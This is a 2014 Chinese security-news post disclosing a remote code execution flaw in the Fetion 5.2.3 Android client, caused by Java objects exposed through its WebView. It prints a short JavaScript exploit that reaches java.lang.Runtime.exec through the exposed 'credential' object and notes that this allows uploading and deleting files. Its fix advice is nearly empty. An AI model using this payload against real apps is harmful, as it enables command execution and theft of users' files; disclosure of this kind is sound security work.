知识屋:更实用的电脑技术知识网站
所在位置:首页 > 网络安全 > 安全资讯

飞信最新版客户端远程代码执行

发布时间:2014-04-28 12:21:59作者:知识屋

惊喜,飞信5.2.3新版本启用自己app嵌入webview,中枪了.这些IM以前没有自己嵌入webview,还没有问题,新版本都搞进来了,结果还没意识。晕!!!
 
 
 
addscriptInterface多处,credential和portrait
 
 
构造exploit部分内容如下:(文件)


function execute(cmdArgs)



{



alert(typeof(credential));



return credential.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);



}

 

详情可见http://50.56.33.56/blog/?p=314
 
 
 
或者其实现中文版 http://www.zhishiwu.com/Article/201309/241271.html
 
 





 
这个是已知问题了,调用后可以执行命令,可以做很多事情,例如上传sd卡文件,上传私有目录下的可读文件、删除文件等等。 
修复方案:

参考限制下 
 

(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜